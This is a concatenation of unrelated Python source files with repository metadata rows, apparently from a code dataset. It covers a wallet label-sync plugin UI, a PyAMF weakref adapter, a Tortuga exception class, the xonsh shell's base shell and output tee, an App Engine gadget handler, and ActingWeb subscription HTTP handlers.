LabelsPlugin.__init__(self, *args)
self.obj = QLabelsSignalObject()
def requires_settings(self):
return True
def settings_widget(self, window):
return EnterButton(_('Settings'),
partial(self.settings_dialog, window))
def settings_dialog(self, window):
wallet = window.parent().wallet
d = WindowModalDialog(window, _("Label Settings"))
hbox = QHBoxLayout()
hbox.addWidget(QLabel("Label sync options:"))
upload = ThreadedButton("Force upload",
partial(self.push_thread, wallet),
partial(self.done_processing_success, d),
partial(self.done_processing_error, d))
download = ThreadedButton("Force download",
partial(self.pull_thread, wallet, True),
partial(self.done_processing_success, d),
partial(self.done_processing_error, d))
vbox = QVBoxLayout()
vbox.addWidget(upload)
vbox.addWidget(download)
hbox.addLayout(vbox)
vbox = QVBoxLayout(d)
vbox.addLayout(hbox)
vbox.addSpacing(20)
vbox.addLayout(Buttons(OkButton(d)))
return bool(d.exec_())
def on_pulled(self, wallet):
self.obj.labels_changed_signal.emit(wallet)
def done_processing_success(self, dialog, result):
dialog.show_message(_("Your labels have been synchronised."))
def done_processing_error(self, dialog, result):
traceback.print_exception(*result, file=sys.stderr)
dialog.show_error(_("Error synchronising labels") + ':\n' + str(result[:2]))
@hook
def load_wallet(self, wallet, window):
# FIXME if the user just enabled the plugin, this hook won't be called
# as the wallet is already loaded, and hence the plugin will be in
# a non-functional state for that window
self.obj.labels_changed_signal.connect(window.update_tabs)
self.start_wallet(wallet)
@hook
def on_close_window(self, window):
self.stop_wallet(window.wallet)
| 35.265823 | 84 | 0.652548 |
ba94fe9a03c46edb200e124794ab920c585ba00f | 546 | py | Python | pyamf/adapters/_weakref.py | frewsxcv/pyamf2 | fcb61d2445b7e456121085320d1c713e33ae1f6a | [
"MIT"
] | null | null | null | pyamf/adapters/_weakref.py | frewsxcv/pyamf2 | fcb61d2445b7e456121085320d1c713e33ae1f6a | [
"MIT"
] | null | null | null | pyamf/adapters/_weakref.py | frewsxcv/pyamf2 | fcb61d2445b7e456121085320d1c713e33ae1f6a | [
"MIT"
] | null | null | null | # Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
C{weakref} support.
@since: 0.6.2
"""
import weakref
import pyamf
from pyamf.adapters import util
class Foo(object):
pass
weakref_type = type(weakref.ref(Foo()))
def get_referent(reference, **kwargs):
return reference()
pyamf.add_type(weakref_type, get_referent)
if hasattr(weakref, 'WeakValueDictionary'):
pyamf.add_type(weakref.WeakValueDictionary, util.to_dict)
if hasattr(weakref, 'WeakSet'):
pyamf.add_type(weakref.WeakSet, util.to_list)
| 14.756757 | 61 | 0.727106 |
484c1b9721dedd99be8602b3042b0f251c0dc82a | 1,070 | py | Python | src/core/src/tortuga/exceptions/invalidProfileCreationTemplate.py | sutasu/tortuga | 48d7cde4fa652346600b217043b4a734fa2ba455 | [
"Apache-2.0"
] | 33 | 2018-03-02T17:07:39.000Z | 2021-05-21T18:02:51.000Z | src/core/src/tortuga/exceptions/invalidProfileCreationTemplate.py | sutasu/tortuga | 48d7cde4fa652346600b217043b4a734fa2ba455 | [
"Apache-2.0"
] | 201 | 2018-03-05T14:28:24.000Z | 2020-11-23T19:58:27.000Z | src/core/src/tortuga/exceptions/invalidProfileCreationTemplate.py | sutasu/tortuga | 48d7cde4fa652346600b217043b4a734fa2ba455 | [
"Apache-2.0"
] | 23 | 2018-03-02T17:21:59.000Z | 2020-11-18T14:52:38.000Z | # Copyright 2008-2018 Univa Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tortuga.exceptions.tortugaException import TortugaException
from tortuga.utility import tortugaStatus
class InvalidProfileCreationTemplate(TortugaException):
"""
Raised from either createSoftwareProfileFromTemplate() or
createHardwareProfileFromTemplate()
"""
def __init__(self, error="", **kwargs):
TortugaException.__init__(
self, error,
tortugaStatus.TORTUGA_INVALID_PROFILE_CREATION_TEMPLATE_ERROR,
**kwargs)
| 36.896552 | 74 | 0.752336 |
5394219197dc663d676f0610b2346a671b882a34 | 20,813 | py | Python | xonsh/base_shell.py | hemna/xonsh | 86c4dec1bb5df1905b65ef553b06fdb5c76b20a8 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2022-02-14T21:56:41.000Z | 2022-02-14T21:56:41.000Z | xonsh/base_shell.py | hemna/xonsh | 86c4dec1bb5df1905b65ef553b06fdb5c76b20a8 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | xonsh/base_shell.py | hemna/xonsh | 86c4dec1bb5df1905b65ef553b06fdb5c76b20a8 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # -*- coding: utf-8 -*-
"""The base class for xonsh shell"""
import io
import os
import sys
import time
import builtins
from xonsh.tools import (
XonshError,
print_exception,
DefaultNotGiven,
check_for_partial_string,
format_std_prepost,
get_line_continuation,
)
from xonsh.platform import HAS_PYGMENTS, ON_WINDOWS
from xonsh.codecache import (
should_use_cache,
code_cache_name,
code_cache_check,
get_cache_filename,
update_cache,
run_compiled_code,
)
from xonsh.completer import Completer
from xonsh.prompt.base import multiline_prompt, PromptFormatter
from xonsh.events import events
from xonsh.shell import transform_command
from xonsh.lazyimps import pygments, pyghooks
from xonsh.ansi_colors import ansi_partial_color_format
if ON_WINDOWS:
    # On Windows the console title is set through the Win32 API. Declare the
    # argument type of SetConsoleTitleW once so ctypes marshals the title as
    # a wide (UTF-16) character pointer instead of guessing from the value.
    import ctypes

    kernel32 = ctypes.windll.kernel32  # type:ignore
    kernel32.SetConsoleTitleW.argtypes = [ctypes.c_wchar_p]
class _TeeStdBuf(io.RawIOBase):
    """A dispatcher for bytes to two buffers, as std stream buffer and an
    in memory buffer.
    """
    def __init__(
        self, stdbuf, membuf, encoding=None, errors=None, prestd=b"", poststd=b""
    ):
        """
        Parameters
        ----------
        stdbuf : BytesIO-like or StringIO-like
            The std stream buffer.
        membuf : BytesIO-like
            The in memory stream buffer.
        encoding : str or None, optional
            The encoding of the stream. Only used if stdbuf is a text stream,
            rather than a binary one. Defaults to $XONSH_ENCODING if None.
        errors : str or None, optional
            The error form for the encoding of the stream. Only used if stdbuf
            is a text stream, rather than a binary one. Defaults to
            $XONSH_ENCODING_ERRORS if None.
        prestd : bytes, optional
            The prefix to prepend to the standard buffer.
        poststd : bytes, optional
            The postfix to append to the standard buffer.
        """
        self.stdbuf = stdbuf
        self.membuf = membuf
        env = builtins.__xonsh__.env
        # Fall back to the session's encoding settings when none are given.
        self.encoding = env.get("XONSH_ENCODING") if encoding is None else encoding
        self.errors = env.get("XONSH_ENCODING_ERRORS") if errors is None else errors
        self.prestd = prestd
        self.poststd = poststd
        # Text-mode std streams need bytes decoded before writing; treat the
        # stream as binary when it lacks an ``encoding`` attribute.
        self._std_is_binary = (not hasattr(stdbuf, "encoding")) or hasattr(
            stdbuf, "_redirect_to"
        )  # VS Code terminal window - has encoding attr but won't accept str
    def fileno(self):
        """Returns the file descriptor of the std buffer."""
        return self.stdbuf.fileno()
    def seek(self, offset, whence=io.SEEK_SET):
        """Sets the location in both the stdbuf and the membuf."""
        self.stdbuf.seek(offset, whence)
        self.membuf.seek(offset, whence)
    def truncate(self, size=None):
        """Truncate both buffers."""
        self.stdbuf.truncate(size)
        self.membuf.truncate(size)
    def readinto(self, b):
        """Read bytes into buffer from both streams."""
        if self._std_is_binary:
            self.stdbuf.readinto(b)
        return self.membuf.readinto(b)
    def write(self, b):
        """Write bytes into both buffers."""
        std_b = b
        # Pre/post decorations go only to the std stream, never to the
        # in-memory copy.
        if self.prestd:
            std_b = self.prestd + b
        if self.poststd:
            std_b += self.poststd
        # write to stdbuf
        if self._std_is_binary:
            self.stdbuf.write(std_b)
        else:
            self.stdbuf.write(std_b.decode(encoding=self.encoding, errors=self.errors))
        return self.membuf.write(b)
class _TeeStd(io.TextIOBase):
    """Tees a std stream into an in-memory container and the original stream."""
    def __init__(self, name, mem, prestd="", poststd=""):
        """
        Parameters
        ----------
        name : str
            The name of the buffer in the sys module, e.g. 'stdout'.
        mem : io.TextIOBase-like
            The in-memory text-based representation.
        prestd : str, optional
            The prefix to prepend to the standard stream.
        poststd : str, optional
            The postfix to append to the standard stream.
        """
        self._name = name
        self.std = std = getattr(sys, name)
        self.mem = mem
        self.prestd = prestd
        self.poststd = poststd
        preb = prestd.encode(encoding=mem.encoding, errors=mem.errors)
        postb = poststd.encode(encoding=mem.encoding, errors=mem.errors)
        if hasattr(std, "buffer"):
            buffer = _TeeStdBuf(std.buffer, mem.buffer, prestd=preb, poststd=postb)
        else:
            # TextIO does not have buffer as part of the API, so std streams
            # may not either.
            buffer = _TeeStdBuf(
                std,
                mem.buffer,
                encoding=mem.encoding,
                errors=mem.errors,
                prestd=preb,
                poststd=postb,
            )
        self.buffer = buffer
        # Install this tee in place of the original sys.<name> stream; the
        # original is restored by close()/__del__ via _replace_std().
        setattr(sys, name, self)
    @property
    def encoding(self):
        """The encoding of the in-memory buffer."""
        return self.mem.encoding
    @property
    def errors(self):
        """The errors of the in-memory buffer."""
        return self.mem.errors
    @property
    def newlines(self):
        """The newlines of the in-memory buffer."""
        return self.mem.newlines
    def _replace_std(self):
        # Put the original stream back on sys.<name>; idempotent.
        std = self.std
        if std is None:
            return
        setattr(sys, self._name, std)
        self.std = self._name = None
    def __del__(self):
        self._replace_std()
    def close(self):
        """Restores the original std stream."""
        self._replace_std()
    def write(self, s):
        """Writes data to the original std stream and the in-memory object."""
        self.mem.write(s)
        if self.std is None:
            return
        std_s = s
        if self.prestd:
            std_s = self.prestd + std_s
        if self.poststd:
            std_s += self.poststd
        self.std.write(std_s)
    def flush(self):
        """Flushes both the original stdout and the buffer."""
        self.std.flush()
        self.mem.flush()
    def fileno(self):
        """Tunnel fileno() calls to the std stream."""
        return self.std.fileno()
    def seek(self, offset, whence=io.SEEK_SET):
        """Seek to a location in both streams."""
        self.std.seek(offset, whence)
        self.mem.seek(offset, whence)
    def truncate(self, size=None):
        """Seek to a location in both streams."""
        self.std.truncate(size)
        self.mem.truncate(size)
    def detach(self):
        """This operation is not supported."""
        raise io.UnsupportedOperation
    def read(self, size=None):
        """Read from the in-memory stream and seek to a new location in the
        std stream.
        """
        s = self.mem.read(size)
        # Advance the std stream by the amount actually read from memory.
        loc = self.std.tell()
        self.std.seek(loc + len(s))
        return s
    def readline(self, size=-1):
        """Read a line from the in-memory stream and seek to a new location
        in the std stream.
        """
        s = self.mem.readline(size)
        loc = self.std.tell()
        self.std.seek(loc + len(s))
        return s
    def isatty(self) -> bool:
        """delegate the method to the underlying io-wrapper"""
        if self.std:  # it happens to be reset sometimes
            return self.std.isatty()
        return super().isatty()
class Tee:
    """Class that merges tee'd stdout and stderr into a single stream.
    This represents what a user would actually see on the command line.
    This class has the same interface as io.TextIOWrapper, except that
    the buffer is optional.
    """
    # pylint is a stupid about counting public methods when using inheritance.
    # pylint: disable=too-few-public-methods
    def __init__(
        self,
        buffer=None,
        encoding=None,
        errors=None,
        newline=None,
        line_buffering=False,
        write_through=False,
    ):
        """Create the shared in-memory buffer and tee stdout/stderr into it."""
        self.buffer = io.BytesIO() if buffer is None else buffer
        self.memory = io.TextIOWrapper(
            self.buffer,
            encoding=encoding,
            errors=errors,
            newline=newline,
            line_buffering=line_buffering,
            write_through=write_through,
        )
        self.stdout = _TeeStd("stdout", self.memory)
        env = builtins.__xonsh__.env
        # stderr may be decorated with user-configurable prefix/postfix, e.g.
        # to colorize it distinctly from stdout.
        prestderr = format_std_prepost(env.get("XONSH_STDERR_PREFIX"))
        poststderr = format_std_prepost(env.get("XONSH_STDERR_POSTFIX"))
        self.stderr = _TeeStd(
            "stderr", self.memory, prestd=prestderr, poststd=poststderr
        )
    @property
    def line_buffering(self):
        """Line-buffering flag of the in-memory text wrapper."""
        return self.memory.line_buffering
    def __del__(self):
        # Dropping the tees restores the original sys.stdout/sys.stderr.
        del self.stdout, self.stderr
        self.stdout = self.stderr = None
    def close(self):
        """Closes the buffer as well as the stdout and stderr tees."""
        self.stdout.close()
        self.stderr.close()
        self.memory.close()
    def getvalue(self):
        """Gets the current contents of the in-memory buffer."""
        m = self.memory
        # Preserve the current position while reading the full contents.
        loc = m.tell()
        m.seek(0)
        s = m.read()
        m.seek(loc)
        return s
class BaseShell(object):
    """The xonsh shell."""
    def __init__(self, execer, ctx, **kwargs):
        """
        Parameters
        ----------
        execer : Execer
            The execution engine used to compile and run input.
        ctx : dict
            The execution context (globals) for compiled code.
        **kwargs
            ``completer=False`` disables tab-completion support.
        """
        super().__init__()
        self.execer = execer
        self.ctx = ctx
        self.completer = Completer() if kwargs.get("completer", True) else None
        # Pending lines of a (possibly multiline) command not yet executed.
        self.buffer = []
        self.need_more_lines = False
        self.src_starts_with_space = False
        self.mlprompt = None
        # Lazily constructed pygments styler; see the ``styler`` property.
        self._styler = DefaultNotGiven
        self.prompt_formatter = PromptFormatter()
        self.accumulated_inputs = ""
    @property
    def styler(self):
        """Pygments-based color styler, constructed on first use.

        None when pygments is not available.
        """
        if self._styler is DefaultNotGiven:
            if HAS_PYGMENTS:
                from xonsh.pyghooks import XonshStyle
                env = builtins.__xonsh__.env
                self._styler = XonshStyle(env.get("XONSH_COLOR_STYLE"))
            else:
                self._styler = None
        return self._styler
    @styler.setter
    def styler(self, value):
        self._styler = value
    @styler.deleter
    def styler(self):
        # Deleting resets to the sentinel so the next access re-creates it.
        self._styler = DefaultNotGiven
    def emptyline(self):
        """Called when an empty line has been entered."""
        self.need_more_lines = False
        self.default("")
    def singleline(self, **kwargs):
        """Reads a single line of input from the shell."""
        msg = "{0} has not implemented singleline()."
        raise RuntimeError(msg.format(self.__class__.__name__))
    def precmd(self, line):
        """Called just before execution of line."""
        return line if self.need_more_lines else line.lstrip()
    def default(self, line, raw_line=None):
        """Implements code execution."""
        line = line if line.endswith("\n") else line + "\n"
        if not self.need_more_lines:  # this is the first line
            if not raw_line:
                self.src_starts_with_space = False
            else:
                self.src_starts_with_space = raw_line[0].isspace()
        src, code = self.push(line)
        if code is None:
            # Either more input is needed or compilation failed; nothing to run.
            return
        events.on_precommand.fire(cmd=src)
        env = builtins.__xonsh__.env
        hist = builtins.__xonsh__.history  # pylint: disable=no-member
        ts1 = None
        enc = env.get("XONSH_ENCODING")
        err = env.get("XONSH_ENCODING_ERRORS")
        # Tee stdout/stderr so the command's output can be recorded in history.
        tee = Tee(encoding=enc, errors=err)
        try:
            ts0 = time.time()
            run_compiled_code(code, self.ctx, None, "single")
            ts1 = time.time()
            if hist is not None and hist.last_cmd_rtn is None:
                hist.last_cmd_rtn = 0  # returncode for success
        except XonshError as e:
            print(e.args[0], file=sys.stderr)
            if hist is not None and hist.last_cmd_rtn is None:
                hist.last_cmd_rtn = 1  # return code for failure
        except Exception:  # pylint: disable=broad-except
            print_exception()
            if hist is not None and hist.last_cmd_rtn is None:
                hist.last_cmd_rtn = 1  # return code for failure
        finally:
            ts1 = ts1 or time.time()
            tee_out = tee.getvalue()
            self._append_history(
                inp=src,
                ts=[ts0, ts1],
                spc=self.src_starts_with_space,
                tee_out=tee_out,
            )
            self.accumulated_inputs += src
            if (
                tee_out
                and env.get("XONSH_APPEND_NEWLINE")
                and not tee_out.endswith(os.linesep)
            ):
                print(os.linesep, end="")
            tee.close()
            self._fix_cwd()
        if builtins.__xonsh__.exit:  # pylint: disable=no-member
            return True
    def _append_history(self, tee_out=None, **info):
        """Append information about the command to the history.
        This also handles on_postcommand because this is the place where all the
        information is available.
        """
        hist = builtins.__xonsh__.history  # pylint: disable=no-member
        info["rtn"] = hist.last_cmd_rtn if hist is not None else None
        tee_out = tee_out or None
        last_out = hist.last_cmd_out if hist is not None else None
        # Merge the teed output with the history backend's captured output.
        if last_out is None and tee_out is None:
            pass
        elif last_out is None and tee_out is not None:
            info["out"] = tee_out
        elif last_out is not None and tee_out is None:
            info["out"] = last_out
        else:
            info["out"] = tee_out + "\n" + last_out
        events.on_postcommand.fire(
            cmd=info["inp"], rtn=info["rtn"], out=info.get("out", None), ts=info["ts"]
        )
        if hist is not None:
            hist.append(info)
            hist.last_cmd_rtn = hist.last_cmd_out = None
    def _fix_cwd(self):
        """Check if the cwd changed out from under us."""
        env = builtins.__xonsh__.env
        try:
            cwd = os.getcwd()
        except (FileNotFoundError, OSError):
            cwd = None
        if cwd is None:
            # directory has been deleted out from under us, most likely
            pwd = env.get("PWD", None)
            if pwd is None:
                # we have no idea where we are
                env["PWD"] = "<invalid directory>"
            elif os.path.isdir(pwd):
                # unclear why os.getcwd() failed. do nothing.
                pass
            else:
                # OK PWD is really gone.
                msg = "{UNDERLINE_INTENSE_WHITE}{BACKGROUND_INTENSE_BLACK}"
                msg += "xonsh: working directory does not exist: " + pwd
                msg += "{RESET}"
                self.print_color(msg, file=sys.stderr)
        elif "PWD" not in env:
            # $PWD is missing from env, recreate it
            env["PWD"] = cwd
        elif os.path.realpath(cwd) != os.path.realpath(env["PWD"]):
            # The working directory has changed without updating $PWD, fix this
            old = env["PWD"]
            env["PWD"] = cwd
            env["OLDPWD"] = old
            events.on_chdir.fire(olddir=old, newdir=cwd)
    def push(self, line):
        """Pushes a line onto the buffer and compiles the code in a way that
        enables multiline input.
        """
        self.buffer.append(line)
        if self.need_more_lines:
            # Still collecting a multiline command; don't compile yet.
            return None, None
        src = "".join(self.buffer)
        src = transform_command(src)
        return self.compile(src)
    def compile(self, src):
        """Compiles source code and returns the (possibly modified) source and
        a valid code object.
        """
        _cache = should_use_cache(self.execer, "single")
        if _cache:
            codefname = code_cache_name(src)
            cachefname = get_cache_filename(codefname, code=True)
            usecache, code = code_cache_check(cachefname)
            if usecache:
                self.reset_buffer()
                return src, code
        lincont = get_line_continuation()
        if src.endswith(lincont + "\n"):
            # Explicit line continuation: request more input.
            self.need_more_lines = True
            return src, None
        try:
            code = self.execer.compile(src, mode="single", glbs=self.ctx, locs=None)
            if _cache:
                update_cache(code, cachefname)
            self.reset_buffer()
        except SyntaxError:
            partial_string_info = check_for_partial_string(src)
            in_partial_string = (
                partial_string_info[0] is not None and partial_string_info[1] is None
            )
            if (src == "\n" or src.endswith("\n\n")) and not in_partial_string:
                # A blank line terminates multiline input; report the error now.
                self.reset_buffer()
                print_exception()
                return src, None
            # Otherwise assume the syntax error means the input is incomplete.
            self.need_more_lines = True
            code = None
        except Exception:  # pylint: disable=broad-except
            self.reset_buffer()
            print_exception()
            code = None
        return src, code
    def reset_buffer(self):
        """Resets the line buffer."""
        self.buffer.clear()
        self.need_more_lines = False
        self.mlprompt = None
    def settitle(self):
        """Sets terminal title."""
        env = builtins.__xonsh__.env  # pylint: disable=no-member
        term = env.get("TERM", None)
        # Shells running in emacs sets TERM to "dumb" or "eterm-color".
        # Do not set title for these to avoid garbled prompt.
        if (term is None and not ON_WINDOWS) or term in [
            "dumb",
            "eterm-color",
            "linux",
        ]:
            return
        t = env.get("TITLE")
        if t is None:
            return
        t = self.prompt_formatter(t)
        if ON_WINDOWS and "ANSICON" not in env:
            kernel32.SetConsoleTitleW(t)
        else:
            with open(1, "wb", closefd=False) as f:
                # prevent xonsh from answering interactive questions
                # on the next command by writing the title
                f.write("\x1b]0;{0}\x07".format(t).encode())
                f.flush()
    @property
    def prompt(self):
        """Obtains the current prompt string."""
        if self.need_more_lines:
            # Within a multiline command the (cached) continuation prompt is used.
            if self.mlprompt is None:
                try:
                    self.mlprompt = multiline_prompt()
                except Exception:  # pylint: disable=broad-except
                    print_exception()
                    self.mlprompt = "<multiline prompt error> "
            return self.mlprompt
        env = builtins.__xonsh__.env  # pylint: disable=no-member
        p = env.get("PROMPT")
        try:
            p = self.prompt_formatter(p)
        except Exception:  # pylint: disable=broad-except
            print_exception()
        self.settitle()
        return p
    def format_color(self, string, hide=False, force_string=False, **kwargs):
        """Formats the colors in a string. ``BaseShell``'s default implementation
        of this method uses colors based on ANSI color codes.
        """
        style = builtins.__xonsh__.env.get("XONSH_COLOR_STYLE")
        return ansi_partial_color_format(string, hide=hide, style=style)
    def print_color(self, string, hide=False, **kwargs):
        """Prints a string in color. This base implementation's colors are based
        on ANSI color codes if a string was given as input. If a list of token
        pairs is given, it will color based on pygments, if available. If
        pygments is not available, it will print a colorless string.
        """
        if isinstance(string, str):
            s = self.format_color(string, hide=hide)
        elif HAS_PYGMENTS:
            # assume this is a list of (Token, str) tuples and format it
            env = builtins.__xonsh__.env
            self.styler.style_name = env.get("XONSH_COLOR_STYLE")
            style_proxy = pyghooks.xonsh_style_proxy(self.styler)
            formatter = pyghooks.XonshTerminal256Formatter(style=style_proxy)
            s = pygments.format(string, formatter).rstrip()
        else:
            # assume this is a list of (Token, str) tuples and remove color
            s = "".join([x for _, x in string])
        print(s, **kwargs)
    def color_style_names(self):
        """Returns an iterable of all available style names."""
        return ()
    def color_style(self):
        """Returns the current color map."""
        return {}
    def restore_tty_sanity(self):
        """An interface for resetting the TTY stdin mode. This is highly
        dependent on the shell backend. Also it is mostly optional since
        it only affects ^Z backgrounding behaviour.
        """
        pass
| 34.401653 | 87 | 0.583001 |
5ce76ec1b408fa9703e3a3c2eaca22000db707c4 | 1,366 | py | Python | appengine/voter-info-gadget.py | geary/election-gadgets.egypt-staging | 80a8349cfea79a44af6ca123c190658b661b9fed | [
"Unlicense"
] | null | null | null | appengine/voter-info-gadget.py | geary/election-gadgets.egypt-staging | 80a8349cfea79a44af6ca123c190658b661b9fed | [
"Unlicense"
] | null | null | null | appengine/voter-info-gadget.py | geary/election-gadgets.egypt-staging | 80a8349cfea79a44af6ca123c190658b661b9fed | [
"Unlicense"
] | null | null | null | #print 'Content-Type: application/xml'
#print ''
#
#f = open( 'voter-info-gadget.xml', 'r' )
#xml = f.read()
#f.close()
#
#print xml
#import re
#from pprint import pformat, pprint
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
#def dumpRequest( req ):
# return pformat({
# 'environ': req.environ,
# 'url': req.url,
# 'headers': req.headers,
# })
#def addDump( xml, req ):
# dr = dumpRequest( req )
# dr = re.sub( r'\}', '\n}', dr )
# dr = re.sub( r"'wsgi[^\n]+\n", '', dr )
# dr = re.sub ( r'\n\s*', ' ', dr )
# dr = re.sub ( r',\s*\}', '}', dr )
# return xml.replace( 'var opt =', 'alert( (' + dr + ').toSource() );\n\n\tvar opt =' ) # poor man's template
class GadgetHandler(webapp.RequestHandler):
    """Serves the gadget XML spec with the {{debug}} placeholder substituted."""

    def get(self, dump, debug):
        """Handle GET for the gadget XML.

        *dump* and *debug* come from the URL route's regex groups; *debug*
        (when present) is substituted into the template, otherwise the
        placeholder is replaced with an empty string.
        """
        self.response.headers['Content-Type'] = 'application/xml'
        if debug is None:
            debug = ''
        # 'with' guarantees the file handle is closed even if read() raises,
        # unlike the previous open()/read()/close() sequence.
        with open('voter-info-gadget-egypt.xml', 'r') as f:
            xml = f.read()
        xml = xml.replace('{{debug}}', debug)  # poor man's template
        self.response.out.write(xml)
# Route the gadget URL (with optional 'dump-' and debug prefixes) to
# GadgetHandler; the two regex groups become the (dump, debug) arguments
# of GadgetHandler.get.
application = webapp.WSGIApplication([
    ( r'/(dump-)?(.+)?voter-info-gadget-egypt\.xml', GadgetHandler )
    ], debug = True )
def main():
    """CGI entry point: run the WSGI application under App Engine."""
    run_wsgi_app( application )

if __name__ == '__main__':
    main()
| 26.269231 | 111 | 0.589312 |
69ead8fcd0b4db0e2eae00deec59f0c82ff12184 | 15,078 | py | Python | actingweb/handlers/subscription.py | gregertw/actingweb | e1c8f66451f547c920c64c4e2a702698e3a0d299 | [
"BSD-3-Clause"
] | null | null | null | actingweb/handlers/subscription.py | gregertw/actingweb | e1c8f66451f547c920c64c4e2a702698e3a0d299 | [
"BSD-3-Clause"
] | null | null | null | actingweb/handlers/subscription.py | gregertw/actingweb | e1c8f66451f547c920c64c4e2a702698e3a0d299 | [
"BSD-3-Clause"
] | null | null | null | from builtins import str
import json
import logging
from actingweb import auth
from actingweb.handlers import base_handler
class SubscriptionRootHandler(base_handler.BaseHandler):
    """Handles requests to /<actor_id>/subscriptions (the subscription root)."""

    def get(self, actor_id):
        """List the actor's subscriptions as JSON.

        Optional query parameters (peerid, target, subtarget, resource)
        narrow the result set; responds 404 when nothing matches.
        """
        # ?_method=POST tunnels a POST through a GET (browser-friendly override).
        if self.request.get('_method') == 'POST':
            self.post(actor_id)
            return
        (myself, check) = auth.init_actingweb(appreq=self,
                                              actor_id=actor_id,
                                              path='subscriptions',
                                              config=self.config)
        if not myself or check.response["code"] != 200:
            return
        if not check.check_authorisation(path='subscriptions', method='GET'):
            self.response.set_status(403)
            return
        peerid = self.request.get('peerid')
        target = self.request.get('target')
        subtarget = self.request.get('subtarget')
        resource = self.request.get('resource')
        subscriptions = myself.get_subscriptions(
            peerid=peerid, target=target, subtarget=subtarget, resource=resource)
        if not subscriptions:
            self.response.set_status(404, 'Not found')
            return
        data = {
            'id': myself.id,
            'data': subscriptions,
        }
        self.response.write(json.dumps(data))
        self.response.headers["Content-Type"] = "application/json"
        self.response.set_status(200, 'Ok')

    def post(self, actor_id):
        """Create a subscription for this actor on a remote peer.

        Accepts a JSON body (peerid and target required; subtarget, resource
        and granularity optional). When the body is not valid JSON, the same
        values are read from request parameters instead. Responds 204 with a
        Location header pointing at the newly created remote subscription.
        """
        (myself, check) = auth.init_actingweb(appreq=self,
                                              actor_id=actor_id,
                                              path='subscriptions',
                                              config=self.config)
        if not myself or check.response["code"] != 200:
            return
        if not check.check_authorisation(path='subscriptions', method='POST'):
            self.response.set_status(403)
            return
        try:
            params = json.loads(self.request.body.decode('utf-8', 'ignore'))
            # dict.get() collapses the per-key presence checks; absent keys
            # yield None (or 'none' for granularity), exactly as before.
            peerid = params.get('peerid')
            target = params.get('target')
            subtarget = params.get('subtarget')
            resource = params.get('resource')
            granularity = params.get('granularity', 'none')
        except ValueError:
            # Body was not JSON; fall back to request parameters.
            peerid = self.request.get('peerid')
            target = self.request.get('target')
            subtarget = self.request.get('subtarget')
            resource = self.request.get('resource')
            granularity = self.request.get('granularity')
        # `not x` already covers both None and the empty string.
        if not peerid:
            self.response.set_status(400, 'Missing peer URL')
            return
        if not target:
            self.response.set_status(400, 'Missing target')
            return
        remote_loc = myself.create_remote_subscription(
            peerid=peerid, target=target, subtarget=subtarget,
            resource=resource, granularity=granularity)
        if not remote_loc:
            self.response.set_status(408, 'Unable to create remote subscription with peer')
            return
        self.response.headers["Location"] = remote_loc
        self.response.set_status(204, 'Created')
# Handling requests to /subscription/*, e.g. /subscription/<peerid>
class SubscriptionRelationshipHandler(base_handler.BaseHandler):
    """Handles requests to /<actor_id>/subscriptions/<peerid>."""

    def get(self, actor_id, peerid):
        """List subscriptions belonging to a specific peer relationship."""
        # ?_method=POST tunnels a POST through a GET (browser-friendly override).
        if self.request.get('_method') == 'POST':
            self.post(actor_id, peerid)
            return
        (myself, check) = auth.init_actingweb(appreq=self,
                                              actor_id=actor_id,
                                              path='subscriptions',
                                              config=self.config)
        if not myself or check.response["code"] != 200:
            return
        if not check.check_authorisation(path='subscriptions', method='GET', peerid=peerid):
            self.response.set_status(403)
            return
        target = self.request.get('target')
        subtarget = self.request.get('subtarget')
        resource = self.request.get('resource')
        subscriptions = myself.get_subscriptions(
            peerid=peerid, target=target, subtarget=subtarget, resource=resource)
        if not subscriptions:
            self.response.set_status(404, 'Not found')
            return
        data = {
            'id': myself.id,
            'peerid': peerid,
            'data': subscriptions,
        }
        self.response.write(json.dumps(data))
        self.response.headers["Content-Type"] = "application/json"
        self.response.set_status(200, 'Ok')

    def post(self, actor_id, peerid):
        """Create a local subscription requested by the peer itself.

        Requires a JSON body with at least 'target'; 'subtarget', 'resource'
        and 'granularity' are optional. The requesting peer must match the
        authenticated peer and must hold GET rights on the target it wants
        to subscribe to. Responds 201 with the new subscription's details.
        """
        (myself, check) = auth.init_actingweb(appreq=self,
                                              actor_id=actor_id,
                                              path='subscriptions',
                                              config=self.config)
        if not myself or check.response["code"] != 200:
            return
        if not check.check_authorisation(path='subscriptions', subpath='<id>', method='POST', peerid=peerid):
            self.response.set_status(403)
            return
        # Keep the try body minimal: only json.loads() can raise ValueError here.
        try:
            params = json.loads(self.request.body.decode('utf-8', 'ignore'))
        except ValueError:
            self.response.set_status(400, 'No json body')
            return
        if 'target' not in params:
            self.response.set_status(400, 'No target in request')
            return
        target = params['target']
        subtarget = params.get('subtarget')
        resource = params.get('resource')
        granularity = params.get('granularity', 'none')
        if peerid != check.acl["peerid"]:
            logging.warning("Peer " + peerid +
                            " tried to create a subscription for peer " + check.acl["peerid"])
            self.response.set_status(403, 'Forbidden. Wrong peer id in request')
            return
        # We need to validate that this peer has GET rights on what it wants to subscribe to
        if not check.check_authorisation(path=target, subpath=subtarget, method='GET', peerid=peerid):
            self.response.set_status(403)
            return
        new_sub = myself.create_subscription(
            peerid=check.acl["peerid"], target=target, subtarget=subtarget,
            resource=resource, granularity=granularity)
        if not new_sub:
            self.response.set_status(500, 'Unable to create new subscription')
            return
        self.response.headers["Location"] = str(self.config.root +
                                                myself.id + '/subscriptions/' + new_sub["peerid"] +
                                                '/' + new_sub["subscriptionid"])
        pair = {
            'subscriptionid': new_sub["subscriptionid"],
            'target': new_sub["target"],
            'subtarget': new_sub["subtarget"],
            'resource': new_sub["resource"],
            'granularity': new_sub["granularity"],
            'sequence': new_sub["sequence"],
        }
        self.response.write(json.dumps(pair))
        self.response.headers["Content-Type"] = "application/json"
        self.response.set_status(201, 'Created')
class SubscriptionHandler(base_handler.BaseHandler):
